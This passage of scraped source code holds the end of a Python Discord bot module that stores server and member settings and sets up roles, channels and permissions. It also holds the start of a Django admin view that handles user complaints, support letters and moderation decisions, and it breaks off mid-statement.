guilds[id]:\n guilds[id][\"verbose_enable\"] = False\n if not \"late_enable\" in guilds[id]:\n guilds[id][\"late_enable\"] = False\n if not \"auto_enable\" in guilds[id]:\n guilds[id][\"auto_enable\"] = False\n if not \"strict_enable\" in guilds[id]:\n guilds[id][\"strict_enable\"] = False\n if not \"chnl_notify\" in guilds[id]:\n guilds[id][\"chnl_notify\"] = 0\n if not \"chnl_approve\" in guilds[id]:\n guilds[id][\"chnl_approve\"] = 0\n if not \"chnl_approve_voice\" in guilds[id]:\n guilds[id][\"chnl_approve_voice\"] = 0\n if not \"role_approve\" in guilds[id]:\n guilds[id][\"role_approve\"] = 0\n if not \"role_member\" in guilds[id]:\n guilds[id][\"role_member\"] = 0\n if not \"role_silence\" in guilds[id]:\n guilds[id][\"role_silence\"] = 0 # was \"role_member\" (copy-paste slip): backfill the missing role_silence key\n if not \"banned_members\" in guilds[id]:\n guilds[id][\"banned_members\"] = {}\n\n async def update_banned_member(\n self, guilds, guild, member: discord.User, time: int = 0\n ):\n id = str(guild.id)\n\n if not str(member.id) in guilds[id][\"banned_members\"]:\n guilds[id][\"banned_members\"][str(member.id)] = {}\n\n guilds[id][\"banned_members\"][str(member.id)][\"time\"] = time\n\n async def update_ban_timer(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n guilds[id][\"banned_members\"][str(member.id)][\"time\"] -= 1\n\n async def get_ban_timer(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n return guilds[id][\"banned_members\"][str(member.id)][\"time\"]\n\n async def delete_banned_member(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n del guilds[id][\"banned_members\"][str(member.id)]\n\n async def update_id_channel(\n self, guilds, guild, channel: discord.channel.TextChannel, type: str\n ):\n id = str(guild.id)\n\n if id in guilds:\n guilds[id][type] = channel.id\n\n async def update_id_role(self, guilds, guild, role: discord.Role, type: str):\n id = str(guild.id)\n\n if id in guilds:\n
guilds[id][type] = role.id\n\n async def update_state_config(self, guilds, guild, cfg: str, state: bool):\n id = str(guild.id)\n\n if id in guilds:\n guilds[id][cfg] = state\n\n async def get_state_config(self, guilds, guild, cfg: str):\n id = str(guild.id)\n\n if id in guilds:\n return guilds[id][cfg]\n\n async def update_data_user(self, members, member: discord.Member):\n id = str(member.id)\n\n if not id in members:\n # if the user is not saved create user object\n members[id] = {}\n members[id][\"checked\"] = False\n members[id][\"flag_approve\"] = False\n members[id][\"score\"] = 0.0\n\n members[id][\"approval\"] = {}\n members[id][\"approval\"][\"days\"] = 0\n members[id][\"approval\"][\"checks\"] = 0\n members[id][\"approval\"][\"score\"] = 0\n members[id][\"approval\"][\"start_date\"] = 0\n members[id][\"approval\"][\"static\"] = 0\n\n if not \"checked\" in members[id]:\n members[id][\"checked\"] = False\n if not \"flag_approve\" in members[id]:\n members[id][\"flag_approve\"] = False\n if not \"score\" in members[id]:\n members[id][\"score\"] = 0.0\n\n if not \"approval\" in members[id]:\n members[id][\"approval\"] = {}\n if not \"days\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"days\"] = 0\n if not \"checks\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"checks\"] = 0\n if not \"score\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"score\"] = 0\n if not \"start_date\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"start_date\"] = 0\n if not \"static\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"static\"] = 0\n\n async def update_state_user(self, members, member, name: str, state):\n id = str(member.id)\n\n members[id][name] = state\n\n async def update_state_user_approval(self, members, member, name: str, state):\n id = str(member.id)\n\n members[id][\"approval\"][name] = state\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def create_channel(self, ctx, name: str, cfg: str, type: str, embed):\n guild = ctx.message.guild\n\n # get existing channel\n channel_existing = discord.utils.get(\n self.client.get_all_channels(), guild__name=ctx.guild.name, name=name,\n )\n\n # if there is an existing channel\n if channel_existing is not None:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_channel(guilds, guild, channel_existing, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Updated existing channel\",\n value=\"`\" + name + \"`\",\n inline=False,\n )\n return\n else:\n # create channel\n if type == \"text\":\n await guild.create_text_channel(name)\n elif type == \"voice\":\n await guild.create_voice_channel(name)\n\n # get created channel\n channel = discord.utils.get(\n self.client.get_all_channels(), guild__name=ctx.guild.name, name=name,\n )\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_channel(guilds, guild, channel, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Created channel\", value=\"`\" + name + \"`\", inline=False\n )\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def create_role(self, ctx, name: str, cfg: str, color: discord.Color, embed):\n guild = ctx.message.guild\n\n # get existing role\n role_existing = discord.utils.get(guild.roles, name=name)\n\n # if the role exists\n if role_existing is not None:\n # update file\n guilds = 
json_load(data_guild)\n\n await self.update_id_role(guilds, guild, role_existing, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Updated existing role\",\n value=role_existing.mention,\n inline=False,\n )\n return\n else:\n # create role\n await guild.create_role(name=name, color=color)\n\n # get created role\n role = discord.utils.get(guild.roles, name=name)\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_role(guilds, guild, role, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(name=\"Created role\", value=role.mention, inline=False)\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def update_perms(self, ctx, guild: discord.Guild, embed: discord.Embed):\n # update file\n guilds = json_load(data_guild)\n\n approve_id = guilds[str(guild.id)][\"role_approve\"]\n member_id = guilds[str(guild.id)][\"role_member\"]\n ch_approve_id = guilds[str(guild.id)][\"chnl_approve\"]\n ch_approve_voice_id = guilds[str(guild.id)][\"chnl_approve_voice\"]\n\n json_save(guilds, data_guild)\n\n approve_role = discord.utils.get(guild.roles, id=approve_id)\n member_role = discord.utils.get(guild.roles, id=member_id)\n\n approve_channel = discord.utils.get(\n self.client.get_all_channels(), guild__name=guild.name, id=ch_approve_id,\n )\n approve_voice_channel = discord.utils.get(\n self.client.get_all_channels(),\n guild__name=guild.name,\n id=ch_approve_voice_id,\n )\n\n text_channel_list = []\n voice_channel_list = []\n\n for channel in guild.text_channels:\n text_channel_list.append(channel)\n for channel in guild.voice_channels:\n voice_channel_list.append(channel)\n\n for ch in text_channel_list:\n if ch.overwrites_for(approve_role).read_messages != False:\n await ch.set_permissions(\n approve_role, read_messages=False, read_message_history=False\n )\n time.sleep(1)\n\n for ch_v in voice_channel_list:\n if ch_v.overwrites_for(approve_role).view_channel != False:\n await ch_v.set_permissions(\n approve_role, view_channel=False, speak=False\n )\n time.sleep(1)\n\n await approve_channel.set_permissions(\n approve_role, view_channel=True, read_message_history=False\n )\n time.sleep(1)\n if approve_channel.overwrites_for(member_role).view_channel != False:\n await approve_channel.set_permissions(\n member_role, view_channel=False, read_message_history=False\n )\n\n await approve_voice_channel.set_permissions(\n approve_role, view_channel=True, speak=True, stream=True\n )\n time.sleep(1)\n if approve_voice_channel.overwrites_for(member_role).view_channel != False:\n await approve_voice_channel.set_permissions(\n member_role, view_channel=False, speak=False\n )\n\n if embed is not None:\n embed.add_field(\n name=\"Set all permissions\",\n value=\"Set permissions for manual approval channels\",\n inline=False,\n )\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def init(self, ctx, args: str = \"\"):\n guild = ctx.message.guild\n role_set = False\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(guilds, guild)\n user_id = guilds[str(guild.id)][\"role_member\"]\n\n json_save(guilds, data_guild)\n\n # create embed\n embed_waiting = discord.Embed(title=\"Setup\", description=\"\", color=color_main)\n embed_waiting.add_field(\n name=\"Please wait\", value=\"Processing request...\", inline=False,\n )\n waiting_msg = None\n\n # create embed\n embed = 
discord.Embed(title=\"Setup\", description=\"\", color=color_done)\n\n def check(author):\n def inner_check(message):\n return message.author == author\n\n return inner_check\n\n # if user role is not set\n if user_id == 0:\n # create embed\n embed_brk = discord.Embed(title=\"Info\", description=\"\", color=color_done)\n embed_brk.add_field(\n name=\"No user role set\",\n value=\"Reply to this message with your role name to set it as a user role\",\n inline=False,\n )\n await ctx.send(embed=embed_brk)\n\n reply = await self.client.wait_for(\n \"message\", check=check(ctx.author), timeout=30\n )\n\n if reply is not None:\n content = reply.content\n\n # get existing role\n role_existing = discord.utils.get(guild.roles, name=content)\n\n role_everyone = guild.default_role\n\n if role_existing is not None or content == \"everyone\":\n # create embed\n embed = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n\n # update file\n guilds = json_load(data_guild)\n\n if content != \"everyone\":\n await self.update_id_role(\n guilds, guild, role_existing, \"role_member\"\n )\n elif content == \"everyone\":\n await self.update_id_role(\n guilds, guild, role_everyone, \"role_member\"\n )\n\n json_save(guilds, data_guild)\n\n if content != \"everyone\":\n embed.add_field(\n name=\"User role set as\",\n value=role_existing.mention,\n inline=False,\n )\n elif content == \"everyone\":\n embed.add_field(\n name=\"User role set as\", value=role_everyone, inline=False\n )\n\n role_done = await ctx.send(embed=embed)\n role_set = True\n time.sleep(2)\n await role_done.delete()\n waiting_msg = await ctx.send(embed=embed_waiting)\n else:\n # create embed\n embed = discord.Embed(\n title=\"Error\", description=\"\", color=color_errr\n )\n embed.add_field(\n name=\"Could not find role\", value=content, inline=False\n )\n await ctx.send(embed=embed)\n return\n\n if role_set:\n # create role\n await self.create_role(\n ctx, \"tao-approval\", \"role_approve\", color_warn, embed\n )\n\n # create channels\n await self.create_channel(\n ctx, \"tao-notifications\", \"chnl_notify\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_manual\", \"chnl_approve\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_voice\", \"chnl_approve_voice\", \"voice\", embed\n )\n\n await self.update_perms(ctx, guild, embed)\n\n embed.add_field(name=\"User role set\", value=\"Setup complete!\", inline=False)\n\n embed.add_field(\n name=\"WARNING\",\n value=\"User checks are `enabled` by default. 
Type `tao score -disable` to disable it.\",\n inline=False,\n )\n\n await waiting_msg.delete()\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(guilds, guild)\n await self.update_state_config(guilds, guild, \"setup_complete\", True)\n\n json_save(guilds, data_guild)\n\n await ctx.send(embed=embed)\n return\n elif not role_set and user_id != 0 and args == \"-reset\":\n # create role\n await self.create_role(\n ctx, \"tao-approval\", \"role_approve\", color_warn, embed\n )\n\n # create channels\n await self.create_channel(\n ctx, \"tao-notifications\", \"chnl_notify\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_manual\", \"chnl_approve\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_voice\", \"chnl_approve_voice\", \"voice\", embed\n )\n\n await self.update_perms(ctx, guild, embed)\n\n embed.add_field(name=\"Reset\", value=\"Reset complete!\", inline=False)\n\n await waiting_msg.delete()\n await ctx.send(embed=embed)\n return\n\n async def set_config(\n self, ctx, cfg: str = \"\", args: str = \"\", cfg_state: bool = False\n ):\n guild = ctx.guild\n\n if args == \"\":\n embed_errr = discord.Embed(title=\"Error\", description=\"\", color=color_errr)\n embed_errr.add_field(\n name=\"Invalid argument\",\n value=\"Available arguments: `-enable`, `-disable`\",\n inline=False,\n )\n if cfg_state:\n embed_errr.add_field(\n name=\"Current value\", value=\"`enabled`\", inline=False,\n )\n else:\n embed_errr.add_field(\n name=\"Current value\", value=\"`disabled`\", inline=False,\n )\n await ctx.send(embed=embed_errr)\n if args == \"-enable\":\n if cfg_state == True:\n embed_warn = discord.Embed(\n title=\"Info\", description=\"\", color=color_done\n )\n embed_warn.add_field(\n name=\"Already enabled\",\n value=\"This function has already been enabled\",\n inline=False,\n )\n await ctx.send(embed=embed_warn)\n elif cfg_state == False:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n if cfg == \"-score\":\n await self.update_state_config(\n self, guilds, guild, \"scre_enable\", True\n )\n elif cfg == \"-verbose\":\n await self.update_state_config(\n self, guilds, guild, \"verbose_enable\", True\n )\n elif cfg == \"-late\":\n await self.update_state_config(\n self, guilds, guild, \"late_enable\", True\n )\n elif cfg == \"-auto\":\n await self.update_state_config(\n self, guilds, guild, \"auto_enable\", True\n )\n elif cfg == \"-strict\":\n await self.update_state_config(\n self, guilds, guild, \"strict_enable\", True\n )\n\n json_save(guilds, data_guild)\n\n embed_done = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n embed_done.add_field(\n name=\"Enabled function\",\n value=\"Successfully enabled the function\",\n inline=False,\n )\n await ctx.send(embed=embed_done)\n elif args == \"-disable\":\n if cfg_state == False:\n embed_warn = discord.Embed(\n title=\"Info\", description=\"\", color=color_done\n )\n embed_warn.add_field(\n name=\"Already disabled\",\n value=\"This function has already been disabled\",\n inline=False,\n )\n await ctx.send(embed=embed_warn)\n elif cfg_state == True:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n if cfg == \"-score\":\n await self.update_state_config(\n self, guilds, guild, \"scre_enable\", False\n )\n elif cfg == \"-verbose\":\n await self.update_state_config(\n self, guilds, guild, \"verbose_enable\", False\n )\n elif cfg == \"-late\":\n await 
self.update_state_config(\n self, guilds, guild, \"late_enable\", False\n )\n elif cfg == \"-auto\":\n await self.update_state_config(\n self, guilds, guild, \"auto_enable\", False\n )\n elif cfg == \"-strict\":\n await self.update_state_config(\n self, guilds, guild, \"strict_enable\", False\n )\n\n json_save(guilds, data_guild)\n\n embed_done = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n embed_done.add_field(\n name=\"Disabled function\",\n value=\"Successfully disabled the function\",\n inline=False,\n )\n await ctx.send(embed=embed_done)\n\n @commands.command(pass_context=True)\n async def setup_notify(self, channel: discord.TextChannel):\n guild = channel.guild\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n dont_send = guilds[str(guild.id)][\"notified\"]\n setup_complete = guilds[str(guild.id)][\"setup_complete\"]\n\n json_save(guilds, data_guild)\n\n if not dont_send and not setup_complete:\n embed_errr = discord.Embed(\n title=\"WARNING!\", description=\"\", color=color_errr\n )\n embed_errr.add_field(\n name=\"Tao has not been set up yet!\",\n value=\"Set Tao up using the command: `tao init`\",\n inline=False,\n )\n await channel.send(embed=embed_errr)\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n await self.update_state_config(self, guilds, guild, \"notified\", True)\n\n json_save(guilds, data_guild)\n elif setup_complete:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n await self.update_state_config(self, guilds, guild, \"notified\", True)\n\n json_save(guilds, data_guild)\n\n\ndef setup(client):\n client.add_cog(Data(client))\n","repo_name":"0x16c3/tao","sub_path":"cogs/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":23235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17926238612","text":"from publicationapp.models import *\nfrom authapp.models import *\n\nfrom .forms import *\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import ListView, UpdateView, DeleteView, CreateView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponseRedirect, HttpResponse\nfrom django.utils import timezone\nfrom django.utils.formats import localize\nfrom django.urls import reverse\n# from datetime import datetime\nfrom django.core.files.storage import FileSystemStorage\nfrom django.db.models.functions import Length\n\n# получение жалобы на пользователя или публикацию через ajax\n@csrf_exempt\ndef NewComplaint(request):\n if request.user.is_authenticated:\n if request.is_ajax():\n complaint = request.POST\n contacting_support = None\n\n # если обращение -- жалоба на публикацию\n if int(complaint['complaint_type']) == 11:\n pub_complaint = Publication.objects.get(id=complaint['complaint_id'])\n pub_complaint.save()\n contacting_support = ContactingSupport.objects.create(title=('Жалоба на публикацию «' + pub_complaint.title +'»'), type=ContactingSupportTypes.objects.get(id=11), asked_by=request.user, ask_content=complaint['complaint_text'], ask_additional_info=complaint['complaint_id'], when_asked=timezone.now())\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n preview = pub_complaint.get_preview,\n content = 'Ваша жалоба на публикацию «'+ pub_complaint.title +'» принята!',\n hover_text = \"Ждите ре��ультата здесь, в 
уведомлениях\"\n ).receiver.add(request.user)\n\n if pub_complaint.author:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n preview = pub_complaint.get_preview,\n content = 'На Вашу публикацию «'+ pub_complaint.title +'» поступила 1 новая жалоба.',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(pub_complaint.author)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n action_person = request.user,\n action_content = 'Жалоба на публикацию «'+ pub_complaint.title +'» от пользователя «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [pub_complaint «'+ pub_complaint.title +'» (id: '+ str(pub_complaint.id) +')]',\n )\n\n # если обращение -- жалоба на пользователя\n if int(complaint['complaint_type']) == 12:\n user_complaint = User.objects.get(id=complaint['complaint_id'])\n user_complaint.save()\n contacting_support = ContactingSupport.objects.create(title=('Жалоба на пользователя «' + user_complaint.username +'»'), type=ContactingSupportTypes.objects.get(id=12), asked_by=request.user, ask_content=complaint['complaint_text'], ask_additional_info=complaint['complaint_id'], when_asked=timezone.now())\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n preview = user_complaint.photo.name,\n content = 'Ваша жалоба на пользователя «'+ user_complaint.username +'» принята!',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(request.user)\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n content = 'На Ваш профиль поступила 1 новая жалоба.',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(user_complaint)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n action_person = request.user,\n action_content = 'Жалоба на пользователя «'+ user_complaint.username +'» от пользователя «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [user_complaint «'+ user_complaint.username +'» (id: '+ str(user_complaint.id) +')]',\n )\n\n # если обращение поступило вместе с фотками\n if request.FILES and int(complaint['complaint_type']) in [11, 12]:\n fs = FileSystemStorage()\n for one_photo in request.FILES:\n # print(photo)\n fs.save(('contacting_support_media/' + one_photo), request.FILES[one_photo])\n ContactingSupportPhotos.objects.create(contacting_support_action=contacting_support, photo=('contacting_support_media/' + one_photo))\n\n if int(complaint['complaint_type']) in [11, 12]:\n return JsonResponse({'result': True})\n\n\n# стартовая страница админа\nclass StartPanel(ListView):\n model = Publication\n template_name = 'adminapp/main.html'\n\n def get(self, *args, **kwargs):\n if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. 
На главную\")\n else:\n resp = super().get(*args, **kwargs)\n return resp\n\n def get_context_data(self, **kwargs):\n title ='Главная | Панель администратора'\n pubs = Publication.objects.filter(type__id__in=[11, 21, 31]).order_by('-pushed')[:3]\n users = User.objects.filter().order_by('-last_entry')[:4]\n tag_categories = TagCategory.objects.all().order_by('id')[:4]\n tags = [Tag.objects.annotate(text_len=Length('name')).filter(text_len__lte=20, category=category)[:4] for category in tag_categories]\n new_letters_to_support = ContactingSupport.objects.filter(answer_content=None).order_by('-when_asked')[:5]\n answered_letters_to_support = ContactingSupport.objects.exclude(answer_content=None).order_by('-when_asked')[:3] if not new_letters_to_support else None\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n data = {\n 'title': title,\n 'pubs': pubs,\n 'users': users,\n 'new_letters_to_support': new_letters_to_support,\n 'answered_letters_to_support': answered_letters_to_support,\n 'new_letters_to_support_count': new_letters_to_support_count,\n \t\t'tags': tags,\n \t\t'tag_categories': tag_categories,\n }\n return data\n\n\n# все обращения в поддержку:\n# их вывод и обработка администраторами\ndef LettersToSupport(request):\n if not request.user.is_authenticated:\n return HttpResponse(\"Сначала авторизируйтесь! Авторизоваться\")\n if not request.user.role.id in [3, 4]:\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n answer_form = AnswerForm()\n answer_to_report_form = AnswerToReportForm()\n\n if request.method == 'POST' and ContactingSupport.objects.filter(id=int(request.POST['ask_id'])).count() >0:\n if not request.POST['answer'].isspace():\n answer = request.POST\n letter = ContactingSupport.objects.get(id=int(answer['ask_id']))\n if letter.type.id == 0 and 'delete_letter' in answer:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010500),\n content = 'Спасибо Вам за Ваше обращение! С Ваши обращением «' + letter.title + '», отправленным ' + str(localize(letter.when_asked)) + ', на каком-то этапе обработки что-то пошло не так... Оно было удалено. Если вопрос остаётся открытым, пожалуйста, сделайте обращение в поддержку ешё раз. Также: если что, на обращение был сделан ответ: «' + answer['answer'] + '». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = \"Просим прощения за неудобства ❤\"\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010500),\n action_person = request.user,\n action_content = 'Сломанное обращение «'+ letter.title +'» от пользователя «'+ letter.asked_by.username +'» отвечено и удалено пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». 
(id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if not letter.answer_content:\n letter.answer_content = answer['answer']\n letter.answered_by = request.user\n letter.when_answered = timezone.now()\n letter.delete()\n\n if not letter.answer_content:\n letter_type = letter.type.id\n action_type = 1012201 if letter_type == 11 else 1011201\n\n if letter_type in [11, 12, 21, 22, 31, 32]:\n letter.answer_content = answer['answer']\n letter.answered_by = request.user\n letter.when_answered = timezone.now()\n\n if letter_type in [11, 12]:\n letter.answer_additional_info = 0\n pub = user = None\n if letter_type == 11:\n pub = Publication.objects.get(id = letter.ask_additional_info) if Publication.objects.filter(id = letter.ask_additional_info) else None\n # noti_preview = pub.get_preview if pub else 'users_avatars/404_something_went_wrong.png'\n report_reason_receiver = pub.author if pub else None\n if letter_type == 12:\n user = User.objects.get(id = letter.ask_additional_info) if User.objects.filter(id = letter.ask_additional_info) else None\n # noti_preview = user.photo.name if user else 'users_avatars/404_something_went_wrong.png'\n report_reason_receiver = user if user else None\n\n nothing_but_just_answer = not 'is_delete_pub' in answer and not 'is_deny_rules' in answer and not 'is_delete_account' in answer\n thats_pub_report_and_pub_author_role_id_is_4 = letter_type == 11 and pub.author.role.id == 4 if pub else None\n thats_account_report_and_account_role_id_is_4 = letter_type == 12 and user.role.id == 4 if user else None\n if (\n (nothing_but_just_answer)\n or (thats_pub_report_and_pub_author_role_id_is_4)\n or (thats_account_report_and_account_role_id_is_4)\n ):\n # print('ответ только сообщением')\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Спасибо Вам за Вашу бдительность и Вашу жалобу! ' + letter.title + ', отправленная Вами ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – закрыть вопрос только текстовым ответом: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу ещё раз, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»!',\n hover_text = 'Если решение не устраивает, можно подать жалобу ещё раз ❤'\n ).receiver.add(letter.asked_by)\n\n if report_reason_receiver:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = letter.title + ', отправленная пользователем «' + letter.asked_by.username + '» ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – закрыть вопрос только текстовым ответом: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»!',\n hover_text = 'Если решение не устраивает, можно подать жалобу ❤'\n ).receiver.add(report_reason_receiver)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». 
(id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n else:\n # print('ответ не только сообщением')\n decision = ''\n decision_for_report_reason_receiver = ''\n if letter_type == 11 and 'is_delete_pub' in answer:\n # print('+ удалить публикацию')\n pub_name = '«' + pub.title + '»' if pub else '[удалена]'\n decision = 'безвозвратно удалить публикацию ' + pub_name\n if pub:\n pub.delete()\n letter.answer_additional_info += 10\n else:\n letter.answer_additional_info += 40\n decision += ' (но она уже была удалена по какой-то причине)'\n\n if decision:\n decision += ' и '\n if report_reason_receiver:\n decision_for_report_reason_receiver = decision\n\n if 'is_deny_rules' in answer and not 'is_delete_account' in answer:\n # print('+ лишить роли')\n report_reason_receiver_name = '«' + report_reason_receiver.username + '» ' if report_reason_receiver else '[удалён] '\n decision += 'понизить пользователя ' + report_reason_receiver_name + 'до роли \"Пользователь-зритель\"'\n if report_reason_receiver:\n decision_for_report_reason_receiver += 'понизить Вас до роли \"Пользователь-зритель\"'\n report_reason_receiver.role = UserRoles.objects.get(id=1)\n report_reason_receiver.save()\n letter.answer_additional_info += 100\n else:\n letter.answer_additional_info += 400\n\n if 'is_delete_account' in answer:\n # print('+ удалить аккаунт')\n report_reason_receiver_name = '«' + report_reason_receiver.username + '»' if report_reason_receiver else '[удалён] '\n decision += 'безвозвратно удалить пользователя ' + report_reason_receiver_name\n if report_reason_receiver:\n report_reason_receiver.delete()\n letter.answer_additional_info += 1000\n else:\n letter.answer_additional_info += 4000\n\n if not report_reason_receiver:\n decision += ' (но этот пользователь по каким-то причинам уже удалён, никаких манипуляций над ним уже не произвести)'\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Спасибо Вам за Вашу бдительность и Вашу жалобу! ' + letter.title + ', отправленная Вами ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – ' + decision + '. Также ответ от поддержки: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу ещё раз, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Если решение не устраивает, можно подать жалобу ещё раз ❤'\n ).receiver.add(letter.asked_by)\n\n if not 'is_delete_account' in answer and report_reason_receiver:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = letter.title + ', отправленная пользователем «' + letter.asked_by.username + '» ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – ' + decision_for_report_reason_receiver + '. Также ответ от поддержки: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Если решение не устраивает, можно подать жалобу ❤'\n ).receiver.add(report_reason_receiver)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». 
(id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if letter_type in [21, 22]:\n letter.ask_additional_info = 999\n if letter_type == 21:\n role_name = 'роль автора публикаций'\n action_type = 1013201\n role_id = 2\n if letter_type == 22:\n role_name = 'роль админа'\n action_type = 1014201\n role_id = 3\n\n if letter.asked_by.role.id == 4 and User.objects.filter(role=UserRoles.objects.get(id=4)).count() <= 1:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Ваша заявка на '+ role_name +' была рассмотрена. На данный момент в системе всего 1 суперпользователь, поэтому нам опасно менять Вам роль. Найдите наследника и обращайтесь ещё! Также ответ от поддержки: «' + answer['answer'] +'». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'По-другому пока не можем. Просим простить нас ❤'\n ).receiver.add(letter.asked_by)\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Заявка на '+ role_name +' от пользователя «' + letter.asked_by.username + '» никак не может быть одобрена: на данный момент в системе всего 1 суперпользователь, поэтому опасно менять ему роль. Придётся подождать наследника и обратиться потом ещё. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'По-другому мы пока не можем. Вот так вот ❤'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = 'Заявка на '+ role_name +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') не обработана – всего 1 суперпользователь в системе.',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n else:\n if answer['change_role'] == 'Назначить новую роль':\n decision = 'поздравляем! Теперь у Вас '+ role_name +'!'\n letter.answer_additional_info = 1\n letter_author = letter.asked_by\n letter_author.role = UserRoles.objects.get(id=role_id)\n letter_author.save()\n else:\n decision = 'к сожалению, '+ role_name +' Вам не назначена.'\n letter.answer_additional_info = 0\n\n Notifications.objects.create(\n type = 